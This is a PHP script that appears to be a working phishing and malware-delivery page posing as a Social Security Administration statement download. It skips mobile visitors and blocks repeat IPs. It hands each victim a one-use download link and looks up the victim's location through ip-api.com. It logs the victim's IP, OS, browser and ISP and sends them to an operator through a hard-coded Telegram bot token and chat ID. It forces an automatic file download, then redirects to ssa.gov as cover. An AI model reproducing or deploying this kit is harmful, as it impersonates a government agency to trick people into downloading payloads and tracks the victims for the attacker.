<?php
$LetterMsgPC = "msg.htm";
$LetterMsgMobile = "msg_mobile.html";
$LinkFile = "download_link.txt";
$LogFile = "downloads.log";
$TelegramToken = "7773535073:AAGmupVrMwwbIz8o3P0Y6g0skr7Yvyjiw-0";
$TelegramChatID = "835321865";

// Mobile detection
function isMobileDevice() {
    return preg_match("/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i", $_SERVER['HTTP_USER_AGENT']);
}

// OS and Browser detection
function getOS() {
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match('/windows nt 10/i', $ua)) return 'Windows 10';
    if (preg_match('/macintosh|mac os x/i', $ua)) return 'Mac OS';
    if (preg_match('/linux/i', $ua)) return 'Linux';
    if (preg_match('/android/i', $ua)) return 'Android';
    if (preg_match('/iphone|ipad/i', $ua)) return 'iOS';
    return 'Unknown OS';
}

function getBrowser() {
    $ua = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match('/MSIE/i', $ua) || preg_match('/Trident/i', $ua)) return 'Internet Explorer';
    if (preg_match('/Edge/i', $ua)) return 'Edge';
    if (preg_match('/Chrome/i', $ua)) return 'Chrome';
    if (preg_match('/Safari/i', $ua)) return 'Safari';
    if (preg_match('/Firefox/i', $ua)) return 'Firefox';
    return 'Unknown Browser';
}

// Show mobile message and exit early
if (isMobileDevice()) {
    echo file_get_contents($LetterMsgMobile);
    exit;
}

// Get client IP
$ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';

// Check if IP already downloaded before by scanning log file
if (file_exists($LogFile)) {
    $logContents = file_get_contents($LogFile);
    if (strpos($logContents, "IP: $ip ") !== false) {
        // IP found in log - block repeated download
        echo <<<HTML
<html lang="en"><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  
   <title>Your Statement - SSA</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      background: url('https://www.ssa.gov/themes/custom/ssa_core/assets/img/ssa/latest-news-background.svg') no-repeat center center fixed;
      background-size: cover; /* Full-page background */
    }

    /* Loader overlay */
    #loader {
      position: fixed;
      width: 100%;
      height: 100%;
      background: white;
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 1000;
    }



    #main-content {
      display: none; /* Hidden until loader disappears */
    }

    header {
      background-color: #003366;
      color: white;
      padding: 1rem 2rem;
      text-align: center;
    }

    main {
      max-width: 600px;
      margin: 3rem auto;
      background-color: white;
      padding: 2rem;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      border-radius: 6px;
      text-align: center;
    }

    h1 {
      color: #003366;
      font-size: 1.5rem;
      margin-bottom: 1rem;
    }
	
	 h2 {
      color: #cc0000;
      font-size: 1.5rem;
      margin-bottom: 1rem;
    }

    .message {
      font-size: 1.1rem;
      color: #333;
    }

    .download-link {
      display: inline-block;
      margin-top: 1.5rem;
      background-color: #005ea2;
      color: white;
      padding: 0.75rem 1.5rem;
      text-decoration: none;
      border-radius: 4px;
    }

    .statement-image {
      margin-top: 2rem;
      max-width: 100%;
      height: auto;
      border: 1px solid #ccc;
      border-radius: 4px;
      cursor: pointer;
    }

    .footer {
      text-align: center;
      font-size: 0.9rem;
      margin-top: 2rem;
      color: #666;
    }
  </style>
</head>
<body>

  <!-- Loader -->
  <div id="loader" style="display: none;">
    <img src="https://i.gifer.com/ZZ5H.gif" alt="Loading..." width="100" height="100">
  </div>

  <!-- Main content -->
  <div id="main-content" style="display: block;">
    <header>
      <h4>Social Security Statement</h4>
    </header>

    <main>
      

      

      <a>
        <h2>You have already downloaded this file</h2>
<img src="https://www.ssa.gov/sites/g/files/npxnvu131/files/icons/iconography_apply-cursor.svg" alt="Statement Preview" class="statement-image" style="
    width: 100px;
">
      </a>
      <h2>Notice:</h2>
<h1>Please review and open your file download statement for more information.</h1>

      

      <div class="footer">
        © 2025 Social Security Administration
      </div>
    </main>
  </div>

  <script>
    // Simulate loading delay
    window.onload = function() {
      setTimeout(() => {
        document.getElementById('loader').style.display = 'none';
        document.getElementById('main-content').style.display = 'block';
      }, 1000); // 1 seconds
    };
  </script>


</body></html>
HTML;
exit;

    }
}

// Check and read links
if (!file_exists($LinkFile)) {
    exit('Download link is not available.');
}

$lines = file($LinkFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$validLinks = array_filter($lines, fn($url) => filter_var(trim($url), FILTER_VALIDATE_URL));

if (empty($validLinks)) {
    exit('No valid links found.');
}

// Select and remove one link for download
$selectedIndex = array_rand($validLinks);
$selectedLink = $validLinks[$selectedIndex];
unset($validLinks[$selectedIndex]);
file_put_contents($LinkFile, implode("\n", $validLinks));

// Gather client data
$os = getOS();
$browser = getBrowser();

// Get geolocation info
$geoInfo = @json_decode(file_get_contents("http://ip-api.com/json/$ip"), true);
$location = ($geoInfo && $geoInfo['status'] === 'success') ?
    $geoInfo['city'] . ', ' . $geoInfo['regionName'] . ', ' . $geoInfo['country'] :
    'Unknown Location';
$isp = $geoInfo['isp'] ?? 'Unknown ISP';

// Log download with timestamp and info
$time = date("Y-m-d H:i:s");
$logEntry = "$time | IP: $ip | Location: $location | OS: $os | Browser: $browser | ISP: $isp | URL: $selectedLink" . PHP_EOL;
file_put_contents($LogFile, $logEntry, FILE_APPEND);

// Prepare Telegram message
$telegramMessage = <<<MSG
📥 New Download
------------------------
🕒 Time: $time
🌐 IP: $ip
📍 Location: $location
💻 OS: $os
🌍 Browser: $browser
🏢 ISP: $isp
🔗 Link: $selectedLink
MSG;

$telegramApiUrl = "https://api.telegram.org/bot$TelegramToken/sendMessage";
$postData = [
    'chat_id' => $TelegramChatID,
    'text' => $telegramMessage,
    'parse_mode' => 'HTML'
];

// Send Telegram notification
$ch = curl_init($telegramApiUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);

// Auto-download JS
$jsDownload = <<<EOD
<script>
    function downloadFile(url) {
        const link = document.createElement('a');
        link.href = url;
        link.download = '';
        document.body.appendChild(link);
        link.click();
        document.body.removeChild(link);
        setTimeout(() => window.location.href = "https://www.ssa.gov", 3000);
    }
    setTimeout(() => downloadFile("$selectedLink"), 1000);
</script>
EOD;

// Output PC message with download JS
echo file_get_contents($LetterMsgPC) . $jsDownload;
exit;
?>
